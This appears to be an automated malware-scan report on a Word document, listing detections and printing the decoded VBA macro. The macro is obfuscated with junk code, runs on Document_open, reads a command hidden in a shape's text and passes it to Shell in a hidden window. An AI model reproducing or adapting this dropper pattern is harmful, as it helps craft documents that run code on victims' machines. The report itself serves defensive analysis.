MALICIOUS
272
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6749022-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6749022-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End If mSEQALKzja = Shell(ArzWjwUkD + ITkKZsH + YduST, Szwvt) If (ZuUbwE <> 0 Or XOwBdiC) Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() If (QvRdjwwG <> 0 Or jjpkRtY) Then -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7618 bytes |
SHA-256: 14b660e1f6a13d9b12e981bfd7f61da88645d09bda1482d814045166224f4169 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
73 of 141 identifiers look randomly generated (e.g. 'iApVLfOOsihq'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iApVLfOOsihq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function KHRhq()
Const Szwvt = 439527984 - 439527984
If (Nvzsq <> 0 Or mLaMRhz) Then
mLaMRhz = True
ViGYz = ViGYz & RhKDjH = 121417404 + 221866330
If (Nvzsq = 1) Then
ViGYz = ViGYz & wcTuj = 458039355 / YtZbDl
ViGYz = ViGYz & vnwCw = sXTaV * 483249791
ViGYz = ViGYz & EPrjlw = 534949742 * jAqiG
Else
ViGYz = ViGYz & ioYPv = 271983887 - 316278359
ViGYz = ViGYz & Cnuji = HGOOwc + 22052945
ViGYz = ViGYz & zTidh = 303741287 - 36021259
End If
End If
If (EXlUPD <> 0 Or JbmCtBW) Then
JbmCtBW = True
ntiDTS = ntiDTS & RLAvlw = 192752380 * 309002419
If (EXlUPD = 1) Then
ntiDTS = ntiDTS & BPFYu = tHcpt - RAEvu
ntiDTS = ntiDTS & TTWwi = 493920242 + 142489765
ntiDTS = ntiDTS & cAiGZ = 76837336 + URWoZ
Else
ntiDTS = ntiDTS & zVGEU = RpKBAa - QGZSi
ntiDTS = ntiDTS & Dkmvun = iHUbvc * 63673345
ntiDTS = ntiDTS & hwYPOw = hoJbzD - 249503782
End If
End If
ArzWjwUkD = Shapes(rCEFEsk + TIXUSnK + 1 + wdpzU + jIwEKr).TextFrame.ContainingRange + aLkqd + XslupEhf
If (EFhNJC <> 0 Or DitMA) Then
DitMA = True
WMOpsdDI = WMOpsdDI & uloNwn = dzfpK * XmRnBl
If (EFhNJC = 1) Then
WMOpsdDI = WMOpsdDI & KHzOhi = bwXIb * 67887169
WMOpsdDI = WMOpsdDI & JKwYw = NlAwh * 421549630
WMOpsdDI = WMOpsdDI & WrocY = cRfkm / 359711123
Else
WMOpsdDI = WMOpsdDI & afUVqh = 36183738 - XNzVMq
WMOpsdDI = WMOpsdDI & rzXrKL = 445338330 + 187581685
WMOpsdDI = WMOpsdDI & CLmdz = 199748913 * RjJfZ
End If
End If
If (zUOLqt <> 0 Or CrYjlJSc) Then
CrYjlJSc = True
QtHDT = QtHDT & mIFwL = MIwdS * 234903451
If (zUOLqt = 1) Then
QtHDT = QtHDT & NXnvkS = nmBGl + 304689503
QtHDT = QtHDT & TSjonY = 209372409 / AuhGGu
QtHDT = QtHDT & HpjZGT = EFSUJ / AjQlCT
Else
QtHDT = QtHDT & sHdUK = 386585719 / 333740662
QtHDT = QtHDT & pjTph = pkvwDb + SJONQT
QtHDT = QtHDT & jcUiwD = hpAMOO - iqlPl
End If
End If
If (wQjsuT <> 0 Or KzWWcmf) Then
KzWWcmf = True
iunabT = iunabT & ThrrJ = rEUwo / taOfzq
If (wQjsuT = 1) Then
iunabT = iunabT & IFpQBN = 498556420 - 522961306
iunabT = iunabT & DBPrzw = 49589626 * bzCADJ
iunabT = iunabT & TtBan = 115924775 + 497119922
Else
iunabT = iunabT & moQPq = mKSdRq + 68150364
iunabT = iunabT & RFppdw = 152761964 - oScMiu
iunabT = iunabT & coLopO = 358997071 - FOlAB
End If
End If
mSEQALKzja = Shell(ArzWjwUkD + ITkKZsH + YduST, Szwvt)
If (ZuUbwE <> 0 Or XOwBdiC) Then
XOwBdiC = True
njQaZsWTu = njQaZsWTu & awztW = KljQi - 428813548
If (ZuUbwE = 1) Then
njQaZsWTu = njQaZsWTu & zRzzn = NEIqE + MVnVR
njQaZsWTu = njQaZsWTu & CbaEWI = irfqsz - QfhwdZ
njQaZsWTu = njQaZsWTu & IGpPk = mhBdoU - NDhuv
Else
njQaZsWTu = njQaZsWTu & XJWhNP = Tujnpr - VuVkol
njQaZsWTu = njQaZsWTu & pwqCC = rXNwm / 500603091
njQaZsWTu = njQaZsWTu & pBwlY = ztYrAN + 5456957
End If
End If
If (IRUJLYo <> 0 Or ObvFbSk) Then
ObvFbSk = True
RBZcY = RBZcY & qTnWn = nYZSv - 508391724
If (IRUJLYo = 1) Then
RBZcY = RBZcY & JMZiLJ = wXWfT - tmpoM
RBZcY = RBZcY & PDDbB = 199251616 - 169484891
RBZcY = RBZcY & plSqq = 471695745 - cJlIY
Else
RBZcY = RBZcY & jqPYch = nUTtj + 476722948
RBZcY = RBZcY & jNDjmF = 33826745 + YMVYlF
RBZcY = RBZcY & UCJRlO = FVzqb / 394274112
End If
End If
If (kwCKV <> 0 Or pbcWL) Then
pbcWL = True
EochjHJIb = EochjHJIb & UoULH = LTomC + PENwKC
If (kwCKV = 1) Then
EochjHJIb = EochjHJIb & JhCjQZ = wwLKJ + dPbNp
EochjHJIb = EochjHJIb & zaPJh = 68084500 / oXZXU
EochjHJIb = EochjHJIb & wHiRmR = 248553025 / ElsTP
Else
EochjHJIb = EochjHJIb & icwDz = 262227463 / zIADEt
EochjHJIb = EochjHJIb & UGbCp = cbNBZ * 365197693
EochjHJIb = EochjHJIb & cJFlZ = GzBDw - 296627680
End If
End If
If (cmTiwGJXi <> 0 Or jiKswv) Then
jiKswv = True
iBlCqZIw = iBlCqZIw & prtwv = 274204505 * OFvEDf
If (cmTiwGJXi = 1) Then
iBlCqZIw = iBlCqZIw & juSTj = 302592381 / 381164844
iBlCqZIw = iBlCqZIw & uRHuc = 146529273 / 77431373
iBlCqZIw = iBlCqZIw & RMCum = 1622546 * 268726083
Else
iBlCqZIw = iBlCqZIw & LmpQR = jQEPFw * 333933572
iBlCqZIw = iBlCqZIw & rChVrk = pDBpi * 301825882
iBlCqZIw = iBlCqZIw & QoiQML = 195126619 + qstMP
End If
End If
If (jSBfMKAl <> 0 Or krKJP) Then
krKJP = True
IkziUNv = IkziUNv & nCunDz = VFPwn - 525854057
If (jSBfMKAl = 1) Then
IkziUNv = IkziUNv & BWdXw = 197990450 - 444219453
IkziUNv = IkziUNv & htZBBu = kIMhH * 39692394
IkziUNv = IkziUNv & ofNcRX = mzOlvN / AGOVLY
Else
IkziUNv = IkziUNv & NtOBtt = OBIXHV - rouMzz
IkziUNv = IkziUNv & jinGnS = 205849807 + 440740828
IkziUNv = IkziUNv & iurWi = amwaYd * XwGNn
End If
End If
End Function
Private Sub Document_open()
If (QvRdjwwG <> 0 Or jjpkRtY) Then
jjpkRtY = True
Xfkwu = Xfkwu & JtbcU = NFkzbi / IGPmD
If (QvRdjwwG = 1) Then
Xfkwu = Xfkwu & AFrVN = SoWob * oWXHj
Xfkwu = Xfkwu & UiMNi = 198886369 * 431199498
Xfkwu = Xfkwu & sJjnPz = tjuuS + 187769981
Else
Xfkwu = Xfkwu & XOWBF = RJomLi / WIRZr
Xfkwu = Xfkwu & bvdEVf = 140005566 / Wjhcu
Xfkwu = Xfkwu & EqLszc = WNmDW / EOdzb
End If
End If
If (BWsjtG <> 0 Or ZcwCmIWU) Then
ZcwCmIWU = True
nWzwkKBIU = nWzwkKBIU & isEqLj = KLzjBM * fdhTib
If (BWsjtG = 1) Then
nWzwkKBIU = nWzwkKBIU & iAICEX = dqUjO - cwUmn
nWzwkKBIU = nWzwkKBIU & JwLUK = KYSHdi + sqvrv
nWzwkKBIU = nWzwkKBIU & GMThUf = 42347204 + mIwiIu
Else
nWzwkKBIU = nWzwkKBIU & ORAXfw = 230255293 * uwqVN
nWzwkKBIU = nWzwkKBIU & JVNhFZ = jHqQrp / zBakw
nWzwkKBIU = nWzwkKBIU & CLbpYL = WMNcLG * 261821782
End If
End If
KHRhq
If (rVuKB <> 0 Or fVkbMsk) Then
fVkbMsk = True
KLPUwkQ = KLPUwkQ & JZhwa = 19916947 * thFVr
If (rVuKB = 1) Then
KLPUwkQ = KLPUwkQ & MVRiw = 386664371 + 455015450
KLPUwkQ = KLPUwkQ & bAcLr = naESjG / SrdMV
KLPUwkQ = KLPUwkQ & CvVbCV = BQSoth + 310300586
Else
KLPUwkQ = KLPUwkQ & qIPlz = DLAGbz + LYbiIv
KLPUwkQ = KLPUwkQ & tKGZZ = 204269273 / 212548949
KLPUwkQ = KLPUwkQ & zcWHPY = 425192714 * 497779227
End If
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.